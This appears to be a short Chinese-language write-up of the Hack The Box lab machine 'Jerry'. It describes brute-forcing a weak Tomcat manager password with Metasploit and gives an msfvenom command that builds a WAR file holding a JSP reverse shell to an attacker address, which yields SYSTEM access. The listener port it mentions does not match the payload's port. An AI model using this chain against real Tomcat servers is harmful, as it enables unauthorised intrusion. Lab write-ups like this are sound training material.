HTB-Jerry

0x01 端口扫描

开放端口如下:

  • 8080端口:Tomcat 7.0.88

操作系统猜测为windows系统

访问8080端口

0x02 Tomcat应用管理服务的弱口令

尝试使用MSF自带的爆破工具进行爆破

等待一段时间获得账户和密码

成功登录,我们获得了war包应用文件的上传和部署权限

接下来构造一个war包然后上传,命令如下

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=8888 -f war > xxxwtbb99.war

监听1101端口

至此我们拿下了最高权限SYSTEM权限,因为主机系统为windows系统,且Tomcat应用管理服务运行于system权限之下,因此我们直接获得了最高的SYSTEM权限。

0x03 总结

  • 信息搜集获得tomcat默认页面
  • tomcat manager app 弱口令登录
  • 上传war包部署并访问,获得SYSTEM权限

发表回复